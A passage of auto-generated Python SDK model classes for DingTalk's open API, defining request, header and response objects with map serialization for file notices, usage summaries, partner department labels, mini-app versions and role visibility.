operate_type: str = None,
):
# DingTalk Drive file ID
self.file_id = file_id
# DingTalk Drive spaceId
self.space_id = space_id
# Operator unionId
self.operator_union_id = operator_union_id
# Operation type: 1 = add, 2 = modify
self.operate_type = operate_type
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.file_id is not None:
result['fileId'] = self.file_id
if self.space_id is not None:
result['spaceId'] = self.space_id
if self.operator_union_id is not None:
result['operatorUnionId'] = self.operator_union_id
if self.operate_type is not None:
result['operateType'] = self.operate_type
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('fileId') is not None:
self.file_id = m.get('fileId')
if m.get('spaceId') is not None:
self.space_id = m.get('spaceId')
if m.get('operatorUnionId') is not None:
self.operator_union_id = m.get('operatorUnionId')
if m.get('operateType') is not None:
self.operate_type = m.get('operateType')
return self
class PublishFileChangeNoticeResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
):
self.headers = headers
def validate(self):
self.validate_required(self.headers, 'headers')
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
return self
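# Usage sketch (illustrative IDs): operateType is carried as a string code,
# '1' for an added file and '2' for a modified one, per the field comment above.
#
#   req = PublishFileChangeNoticeRequest(file_id='f123', space_id='s456',
#                                        operator_union_id='un789',
#                                        operate_type='2')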
class GetGeneralFormCreatedDeptSummaryHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetGeneralFormCreatedDeptSummaryRequest(TeaModel):
def __init__(
self,
next_token: int = None,
max_results: int = None,
):
# Starting data cursor
self.next_token = next_token
# Number of records per page
self.max_results = max_results
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.next_token is not None:
result['nextToken'] = self.next_token
if self.max_results is not None:
result['maxResults'] = self.max_results
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('nextToken') is not None:
self.next_token = m.get('nextToken')
if m.get('maxResults') is not None:
self.max_results = m.get('maxResults')
return self
class GetGeneralFormCreatedDeptSummaryResponseBodyData(TeaModel):
def __init__(
self,
dept_id: str = None,
dept_name: str = None,
general_form_create_cnt_1d: str = None,
):
# Department ID
self.dept_id = dept_id
# Department name
self.dept_name = dept_name
# Cumulative number of Smart Forms published in the last day
self.general_form_create_cnt_1d = general_form_create_cnt_1d
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.dept_id is not None:
result['deptId'] = self.dept_id
if self.dept_name is not None:
result['deptName'] = self.dept_name
if self.general_form_create_cnt_1d is not None:
result['generalFormCreateCnt1d'] = self.general_form_create_cnt_1d
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('deptId') is not None:
self.dept_id = m.get('deptId')
if m.get('deptName') is not None:
self.dept_name = m.get('deptName')
if m.get('generalFormCreateCnt1d') is not None:
self.general_form_create_cnt_1d = m.get('generalFormCreateCnt1d')
return self
class GetGeneralFormCreatedDeptSummaryResponseBody(TeaModel):
def __init__(
self,
data: List[GetGeneralFormCreatedDeptSummaryResponseBodyData] = None,
next_token: int = None,
has_more: bool = None,
):
# Per-department Smart Form creation summaries
self.data = data
# Pagination cursor for the next request
self.next_token = next_token
# Whether more data is available
self.has_more = has_more
def validate(self):
if self.data:
for k in self.data:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['data'] = []
if self.data is not None:
for k in self.data:
result['data'].append(k.to_map() if k else None)
if self.next_token is not None:
result['nextToken'] = self.next_token
if self.has_more is not None:
result['hasMore'] = self.has_more
return result
def from_map(self, m: dict = None):
m = m or dict()
self.data = []
if m.get('data') is not None:
for k in m.get('data'):
temp_model = GetGeneralFormCreatedDeptSummaryResponseBodyData()
self.data.append(temp_model.from_map(k))
if m.get('nextToken') is not None:
self.next_token = m.get('nextToken')
if m.get('hasMore') is not None:
self.has_more = m.get('hasMore')
return self
class GetGeneralFormCreatedDeptSummaryResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetGeneralFormCreatedDeptSummaryResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetGeneralFormCreatedDeptSummaryResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetCalenderSummaryHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetCalenderSummaryResponseBody(TeaModel):
def __init__(
self,
calendar_create_user_cnt: str = None,
):
# Cumulative number of users who created calendar events in the last day
self.calendar_create_user_cnt = calendar_create_user_cnt
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.calendar_create_user_cnt is not None:
result['calendarCreateUserCnt'] = self.calendar_create_user_cnt
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('calendarCreateUserCnt') is not None:
self.calendar_create_user_cnt = m.get('calendarCreateUserCnt')
return self
class GetCalenderSummaryResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetCalenderSummaryResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetCalenderSummaryResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetAllLabelableDeptsHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetAllLabelableDeptsResponseBodyDataPartnerLabelVOLevel1(TeaModel):
def __init__(
self,
label_id: int = None,
label_name: str = None,
level_num: int = None,
):
# Partner type ID
self.label_id = label_id
# Partner type name
self.label_name = label_name
# Partner type level
self.level_num = level_num
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.label_id is not None:
result['labelId'] = self.label_id
if self.label_name is not None:
result['labelName'] = self.label_name
if self.level_num is not None:
result['levelNum'] = self.level_num
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('labelId') is not None:
self.label_id = m.get('labelId')
if m.get('labelName') is not None:
self.label_name = m.get('labelName')
if m.get('levelNum') is not None:
self.level_num = m.get('levelNum')
return self
class GetAllLabelableDeptsResponseBodyDataPartnerLabelVOLevel2(TeaModel):
def __init__(
self,
label_id: int = None,
label_name: str = None,
level_num: int = None,
):
# Partner type ID
self.label_id = label_id
# Partner type name
self.label_name = label_name
# Partner type level
self.level_num = level_num
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.label_id is not None:
result['labelId'] = self.label_id
if self.label_name is not None:
result['labelName'] = self.label_name
if self.level_num is not None:
result['levelNum'] = self.level_num
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('labelId') is not None:
self.label_id = m.get('labelId')
if m.get('labelName') is not None:
self.label_name = m.get('labelName')
if m.get('levelNum') is not None:
self.level_num = m.get('levelNum')
return self
class GetAllLabelableDeptsResponseBodyDataPartnerLabelVOLevel3(TeaModel):
def __init__(
self,
label_id: int = None,
label_name: str = None,
level_num: int = None,
):
# Partner type ID
self.label_id = label_id
# Partner type name
self.label_name = label_name
# Partner type level
self.level_num = level_num
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.label_id is not None:
result['labelId'] = self.label_id
if self.label_name is not None:
result['labelName'] = self.label_name
if self.level_num is not None:
result['levelNum'] = self.level_num
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('labelId') is not None:
self.label_id = m.get('labelId')
if m.get('labelName') is not None:
self.label_name = m.get('labelName')
if m.get('levelNum') is not None:
self.level_num = m.get('levelNum')
return self
class GetAllLabelableDeptsResponseBodyDataPartnerLabelVOLevel4(TeaModel):
def __init__(
self,
label_id: int = None,
label_name: str = None,
level_num: int = None,
):
# Partner type ID
self.label_id = label_id
# Partner type name
self.label_name = label_name
# Partner type level
self.level_num = level_num
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.label_id is not None:
result['labelId'] = self.label_id
if self.label_name is not None:
result['labelName'] = self.label_name
if self.level_num is not None:
result['levelNum'] = self.level_num
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('labelId') is not None:
self.label_id = m.get('labelId')
if m.get('labelName') is not None:
self.label_name = m.get('labelName')
if m.get('levelNum') is not None:
self.level_num = m.get('levelNum')
return self
class GetAllLabelableDeptsResponseBodyDataPartnerLabelVOLevel5(TeaModel):
def __init__(
self,
label_id: int = None,
label_name: str = None,
level_num: int = None,
):
# Partner type ID
self.label_id = label_id
# Partner type name
self.label_name = label_name
# Partner type level
self.level_num = level_num
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.label_id is not None:
result['labelId'] = self.label_id
if self.label_name is not None:
result['labelName'] = self.label_name
if self.level_num is not None:
result['levelNum'] = self.level_num
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('labelId') is not None:
self.label_id = m.get('labelId')
if m.get('labelName') is not None:
self.label_name = m.get('labelName')
if m.get('levelNum') is not None:
self.level_num = m.get('levelNum')
return self
class GetAllLabelableDeptsResponseBodyData(TeaModel):
def __init__(
self,
dept_id: str = None,
super_dept_id: str = None,
dept_name: str = None,
member_count: int = None,
partner_num: str = None,
partner_label_volevel_1: GetAllLabelableDeptsResponseBodyDataPartnerLabelVOLevel1 = None,
partner_label_volevel_2: GetAllLabelableDeptsResponseBodyDataPartnerLabelVOLevel2 = None,
partner_label_volevel_3: GetAllLabelableDeptsResponseBodyDataPartnerLabelVOLevel3 = None,
partner_label_volevel_4: GetAllLabelableDeptsResponseBodyDataPartnerLabelVOLevel4 = None,
partner_label_volevel_5: GetAllLabelableDeptsResponseBodyDataPartnerLabelVOLevel5 = None,
):
# Department ID
self.dept_id = dept_id
# Parent department ID
self.super_dept_id = super_dept_id
# Department name
self.dept_name = dept_name
# Number of members in the department
self.member_count = member_count
# Department partner code
self.partner_num = partner_num
# Level-1 partner type of the department
self.partner_label_volevel_1 = partner_label_volevel_1
# Level-2 partner type of the department
self.partner_label_volevel_2 = partner_label_volevel_2
# Level-3 partner type of the department
self.partner_label_volevel_3 = partner_label_volevel_3
# Level-4 partner type of the department
self.partner_label_volevel_4 = partner_label_volevel_4
# Level-5 partner type of the department
self.partner_label_volevel_5 = partner_label_volevel_5
def validate(self):
if self.partner_label_volevel_1:
self.partner_label_volevel_1.validate()
if self.partner_label_volevel_2:
self.partner_label_volevel_2.validate()
if self.partner_label_volevel_3:
self.partner_label_volevel_3.validate()
if self.partner_label_volevel_4:
self.partner_label_volevel_4.validate()
if self.partner_label_volevel_5:
self.partner_label_volevel_5.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.dept_id is not None:
result['deptId'] = self.dept_id
if self.super_dept_id is not None:
result['superDeptId'] = self.super_dept_id
if self.dept_name is not None:
result['deptName'] = self.dept_name
if self.member_count is not None:
result['memberCount'] = self.member_count
if self.partner_num is not None:
result['partnerNum'] = self.partner_num
if self.partner_label_volevel_1 is not None:
result['partnerLabelVOLevel1'] = self.partner_label_volevel_1.to_map()
if self.partner_label_volevel_2 is not None:
result['partnerLabelVOLevel2'] = self.partner_label_volevel_2.to_map()
if self.partner_label_volevel_3 is not None:
result['partnerLabelVOLevel3'] = self.partner_label_volevel_3.to_map()
if self.partner_label_volevel_4 is not None:
result['partnerLabelVOLevel4'] = self.partner_label_volevel_4.to_map()
if self.partner_label_volevel_5 is not None:
result['partnerLabelVOLevel5'] = self.partner_label_volevel_5.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('deptId') is not None:
self.dept_id = m.get('deptId')
if m.get('superDeptId') is not None:
self.super_dept_id = m.get('superDeptId')
if m.get('deptName') is not None:
self.dept_name = m.get('deptName')
if m.get('memberCount') is not None:
self.member_count = m.get('memberCount')
if m.get('partnerNum') is not None:
self.partner_num = m.get('partnerNum')
if m.get('partnerLabelVOLevel1') is not None:
temp_model = GetAllLabelableDeptsResponseBodyDataPartnerLabelVOLevel1()
self.partner_label_volevel_1 = temp_model.from_map(m['partnerLabelVOLevel1'])
if m.get('partnerLabelVOLevel2') is not None:
temp_model = GetAllLabelableDeptsResponseBodyDataPartnerLabelVOLevel2()
self.partner_label_volevel_2 = temp_model.from_map(m['partnerLabelVOLevel2'])
if m.get('partnerLabelVOLevel3') is not None:
temp_model = GetAllLabelableDeptsResponseBodyDataPartnerLabelVOLevel3()
self.partner_label_volevel_3 = temp_model.from_map(m['partnerLabelVOLevel3'])
if m.get('partnerLabelVOLevel4') is not None:
temp_model = GetAllLabelableDeptsResponseBodyDataPartnerLabelVOLevel4()
self.partner_label_volevel_4 = temp_model.from_map(m['partnerLabelVOLevel4'])
if m.get('partnerLabelVOLevel5') is not None:
temp_model = GetAllLabelableDeptsResponseBodyDataPartnerLabelVOLevel5()
self.partner_label_volevel_5 = temp_model.from_map(m['partnerLabelVOLevel5'])
return self
class GetAllLabelableDeptsResponseBody(TeaModel):
def __init__(
self,
data: List[GetAllLabelableDeptsResponseBodyData] = None,
):
# List of departments that can be labeled in Partner DingTalk
self.data = data
def validate(self):
if self.data:
for k in self.data:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['data'] = []
if self.data is not None:
for k in self.data:
result['data'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
self.data = []
if m.get('data') is not None:
for k in m.get('data'):
temp_model = GetAllLabelableDeptsResponseBodyData()
self.data.append(temp_model.from_map(k))
return self
class GetAllLabelableDeptsResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetAllLabelableDeptsResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetAllLabelableDeptsResponseBody()
self.body = temp_model.from_map(m['body'])
return self
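# Deserialization sketch (illustrative values): nested partnerLabelVOLevelN
# dicts are hydrated into their dedicated sub-models by from_map().
#
#   data = GetAllLabelableDeptsResponseBodyData().from_map({
#       'deptId': '100', 'superDeptId': '1', 'deptName': 'Partners',
#       'memberCount': 8, 'partnerNum': 'P-001',
#       'partnerLabelVOLevel1': {'labelId': 7, 'labelName': 'Reseller', 'levelNum': 1},
#   })
#   assert data.partner_label_volevel_1.label_name == 'Reseller'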
class GetPublisherSummaryHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetPublisherSummaryRequest(TeaModel):
def __init__(
self,
next_token: int = None,
max_results: int = None,
):
# Starting data cursor
self.next_token = next_token
# Number of records per page
self.max_results = max_results
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.next_token is not None:
result['nextToken'] = self.next_token
if self.max_results is not None:
result['maxResults'] = self.max_results
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('nextToken') is not None:
self.next_token = m.get('nextToken')
if m.get('maxResults') is not None:
self.max_results = m.get('maxResults')
return self
class GetPublisherSummaryResponseBodyData(TeaModel):
def __init__(
self,
union_id: str = None,
publisher_name: str = None,
publisher_article_cnt_std: str = None,
publisher_article_pv_cnt_std: str = None,
):
# Service window unionId
self.union_id = union_id
# Service window name
self.publisher_name = publisher_name
# Total number of service window articles published to date
self.publisher_article_cnt_std = publisher_article_cnt_std
# Total number of service window article views to date
self.publisher_article_pv_cnt_std = publisher_article_pv_cnt_std
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.union_id is not None:
result['unionId'] = self.union_id
if self.publisher_name is not None:
result['publisherName'] = self.publisher_name
if self.publisher_article_cnt_std is not None:
result['publisherArticleCntStd'] = self.publisher_article_cnt_std
if self.publisher_article_pv_cnt_std is not None:
result['publisherArticlePvCntStd'] = self.publisher_article_pv_cnt_std
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('unionId') is not None:
self.union_id = m.get('unionId')
if m.get('publisherName') is not None:
self.publisher_name = m.get('publisherName')
if m.get('publisherArticleCntStd') is not None:
self.publisher_article_cnt_std = m.get('publisherArticleCntStd')
if m.get('publisherArticlePvCntStd') is not None:
self.publisher_article_pv_cnt_std = m.get('publisherArticlePvCntStd')
return self
class GetPublisherSummaryResponseBodyPublisherArticlePvTop5(TeaModel):
def __init__(
self,
name: str = None,
):
# Article title
self.name = name
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.name is not None:
result['name'] = self.name
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('name') is not None:
self.name = m.get('name')
return self
class GetPublisherSummaryResponseBody(TeaModel):
def __init__(
self,
data: List[GetPublisherSummaryResponseBodyData] = None,
publisher_cnt_std: str = None,
publisher_article_cnt_std: str = None,
publisher_article_pv_cnt_std: str = None,
publisher_article_pv_top_5: List[GetPublisherSummaryResponseBodyPublisherArticlePvTop5] = None,
next_token: int = None,
has_more: bool = None,
):
# Data on interactive service windows
self.data = data
# Total number of service windows to date
self.publisher_cnt_std = publisher_cnt_std
# Total number of service window articles published to date
self.publisher_article_cnt_std = publisher_article_cnt_std
# Total number of service window article views to date
self.publisher_article_pv_cnt_std = publisher_article_pv_cnt_std
# Top 5 articles by view count
self.publisher_article_pv_top_5 = publisher_article_pv_top_5
# Pagination cursor for the next request
self.next_token = next_token
# Whether more data is available
self.has_more = has_more
def validate(self):
if self.data:
for k in self.data:
if k:
k.validate()
if self.publisher_article_pv_top_5:
for k in self.publisher_article_pv_top_5:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['data'] = []
if self.data is not None:
for k in self.data:
result['data'].append(k.to_map() if k else None)
if self.publisher_cnt_std is not None:
result['publisherCntStd'] = self.publisher_cnt_std
if self.publisher_article_cnt_std is not None:
result['publisherArticleCntStd'] = self.publisher_article_cnt_std
if self.publisher_article_pv_cnt_std is not None:
result['publisherArticlePvCntStd'] = self.publisher_article_pv_cnt_std
result['publisherArticlePvTop5'] = []
if self.publisher_article_pv_top_5 is not None:
for k in self.publisher_article_pv_top_5:
result['publisherArticlePvTop5'].append(k.to_map() if k else None)
if self.next_token is not None:
result['nextToken'] = self.next_token
if self.has_more is not None:
result['hasMore'] = self.has_more
return result
def from_map(self, m: dict = None):
m = m or dict()
self.data = []
if m.get('data') is not None:
for k in m.get('data'):
temp_model = GetPublisherSummaryResponseBodyData()
self.data.append(temp_model.from_map(k))
if m.get('publisherCntStd') is not None:
self.publisher_cnt_std = m.get('publisherCntStd')
if m.get('publisherArticleCntStd') is not None:
self.publisher_article_cnt_std = m.get('publisherArticleCntStd')
if m.get('publisherArticlePvCntStd') is not None:
self.publisher_article_pv_cnt_std = m.get('publisherArticlePvCntStd')
self.publisher_article_pv_top_5 = []
if m.get('publisherArticlePvTop5') is not None:
for k in m.get('publisherArticlePvTop5'):
temp_model = GetPublisherSummaryResponseBodyPublisherArticlePvTop5()
self.publisher_article_pv_top_5.append(temp_model.from_map(k))
if m.get('nextToken') is not None:
self.next_token = m.get('nextToken')
if m.get('hasMore') is not None:
self.has_more = m.get('hasMore')
return self
class GetPublisherSummaryResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetPublisherSummaryResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetPublisherSummaryResponseBody()
self.body = temp_model.from_map(m['body'])
return self
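# Deserialization sketch (illustrative values): this body carries two model
# lists, per-publisher stats in 'data' and the top-5 articles by views.
#
#   body = GetPublisherSummaryResponseBody().from_map({
#       'data': [{'unionId': 'un01', 'publisherName': 'News',
#                 'publisherArticleCntStd': '12',
#                 'publisherArticlePvCntStd': '340'}],
#       'publisherArticlePvTop5': [{'name': 'Release notes'}],
#       'nextToken': 20, 'hasMore': True,
#   })
#   top_titles = [a.name for a in body.publisher_article_pv_top_5]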
class UpdateMiniAppVersionStatusHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class UpdateMiniAppVersionStatusRequest(TeaModel):
def __init__(
self,
version_type: int = None,
version: str = None,
mini_app_id: str = None,
ding_client_id: str = None,
ding_token_grant_type: int = None,
ding_org_id: int = None,
ding_isv_org_id: int = None,
ding_suite_key: str = None,
ding_corp_id: str = None,
):
# Version type
self.version_type = version_type
# Version
self.version = version
# Mini-app ID
self.mini_app_id = mini_app_id
self.ding_client_id = ding_client_id
self.ding_token_grant_type = ding_token_grant_type
self.ding_org_id = ding_org_id
self.ding_isv_org_id = ding_isv_org_id
self.ding_suite_key = ding_suite_key
self.ding_corp_id = ding_corp_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.version_type is not None:
result['versionType'] = self.version_type
if self.version is not None:
result['version'] = self.version
if self.mini_app_id is not None:
result['miniAppId'] = self.mini_app_id
if self.ding_client_id is not None:
result['dingClientId'] = self.ding_client_id
if self.ding_token_grant_type is not None:
result['dingTokenGrantType'] = self.ding_token_grant_type
if self.ding_org_id is not None:
result['dingOrgId'] = self.ding_org_id
if self.ding_isv_org_id is not None:
result['dingIsvOrgId'] = self.ding_isv_org_id
if self.ding_suite_key is not None:
result['dingSuiteKey'] = self.ding_suite_key
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('versionType') is not None:
self.version_type = m.get('versionType')
if m.get('version') is not None:
self.version = m.get('version')
if m.get('miniAppId') is not None:
self.mini_app_id = m.get('miniAppId')
if m.get('dingClientId') is not None:
self.ding_client_id = m.get('dingClientId')
if m.get('dingTokenGrantType') is not None:
self.ding_token_grant_type = m.get('dingTokenGrantType')
if m.get('dingOrgId') is not None:
self.ding_org_id = m.get('dingOrgId')
if m.get('dingIsvOrgId') is not None:
self.ding_isv_org_id = m.get('dingIsvOrgId')
if m.get('dingSuiteKey') is not None:
self.ding_suite_key = m.get('dingSuiteKey')
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
return self
class UpdateMiniAppVersionStatusResponseBody(TeaModel):
def __init__(
self,
code: str = None,
cause: str = None,
):
# Return code
self.code = code
# Reason
self.cause = cause
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.code is not None:
result['code'] = self.code
if self.cause is not None:
result['cause'] = self.cause
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('code') is not None:
self.code = m.get('code')
if m.get('cause') is not None:
self.cause = m.get('cause')
return self
class UpdateMiniAppVersionStatusResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: UpdateMiniAppVersionStatusResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = UpdateMiniAppVersionStatusResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class UpdateRoleVisibilityHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class UpdateRoleVisibilityRequest(TeaModel):
def __init__(
self,
label_id: int = None,
dept_ids: List[int] = None,
user_ids: List[str] = None,
ding_client_id: str = None,
ding_token_grant_type: int = None,
ding_org_id: int = None,
ding_isv_org_id: int = None,
ding_suite_key: str = None,
ding_corp_id: str = None,
):
# Label ID
self.label_id = label_id
# IDs of departments the role is visible to
self.dept_ids = dept_ids
# IDs of users the role is visible to
self.user_ids = user_ids
self.ding_client_id = ding_client_id
self.ding_token_grant_type = ding_token_grant_type
self.ding_org_id = ding_org_id
self.ding_isv_org_id = ding_isv_org_id
self.ding_suite_key = ding_suite_key
self.ding_corp_id = ding_corp_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.label_id is not None:
result['labelId'] = self.label_id
if self.dept_ids is not None:
result['deptIds'] = self.dept_ids
if self.user_ids is not None:
result['userIds'] = self.user_ids
if self.ding_client_id is not None:
result['dingClientId'] = self.ding_client_id
if self.ding_token_grant_type is not None:
result['dingTokenGrantType'] = self.ding_token_grant_type
if self.ding_org_id is not None:
result['dingOrgId'] = self.ding_org_id
